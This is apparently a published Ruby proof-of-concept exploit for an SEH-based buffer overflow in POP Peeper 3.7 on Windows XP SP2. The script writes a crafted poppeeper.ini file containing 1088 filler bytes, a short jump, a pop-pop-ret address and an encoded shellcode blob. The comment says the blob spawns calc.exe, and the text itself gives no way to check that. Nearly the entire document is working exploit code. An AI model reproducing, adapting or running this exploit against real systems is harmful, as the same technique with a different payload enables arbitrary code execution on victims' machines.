#!/usr/bin/ruby ############################################################################# # Title: POP Peeper 3.7 SEH Exploit # Tested on: Windows XP SP2 EN # Target: POP Peeper 3.7.0.0 # Download Link: http://www.poppeeper.com/download.php # Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com # Greetz: offsec team, inj3ct0r team ############################################################################# appdata = ENV['APPDATA'] file = appdata +"\\POP Peeper\\poppeeper.ini" f = open(file, "wb") eb = "\xeb\x06\x90\x90" ppr = "\x67\x15\xD3\x74" #Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148) #Spawn calc.exe, bad characters: \x00\x0a\x0d shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" + "\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" + "\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" + "\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" + "\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" + "\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" + "\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" + "\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" + "\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" + "\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" + "\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" + "\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" + "\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" + "\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" + "\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" + "\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" + "\xca\xd5\x1e") f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n") f.close()